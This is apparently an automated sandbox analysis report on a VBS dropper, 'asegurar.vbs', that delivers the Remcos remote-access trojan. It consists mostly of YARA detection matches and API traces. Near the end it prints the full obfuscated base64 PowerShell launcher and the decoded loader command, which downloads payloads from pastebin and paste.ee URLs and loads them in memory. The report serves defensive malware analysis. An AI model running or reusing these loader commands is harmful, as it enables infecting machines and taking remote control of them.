                    Source: Yara match | File source: 00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041CA6D SystemParametersInfoW
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041CA73 SystemParametersInfoW

                    System Summary

                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects known downloader agent Author: ditekSHen
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects known downloader agent Author: ditekSHen
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR | Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (obfuscated, base64-encoded command line omitted)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9B9840E0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9BA41493
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004387F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004339D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00437DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00426E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 00401E65 appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: String function: 00434801 appears 41 times
                    Source: asegurar.vbs | Initial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 2620
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.260254f0000.0.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.260254f0000.0.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.2603d9b0000.5.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.2603d9b0000.5.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.26025b147d0.2.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.26025b147d0.2.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@14/10@5/5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,8_2_0040F4AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,8_2_0041B539
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AADB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-T0UVJ0
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mipky4am.ds4.ps1
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs"
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: asegurar.vbsReversingLabs: Detection: 15%
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a
?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
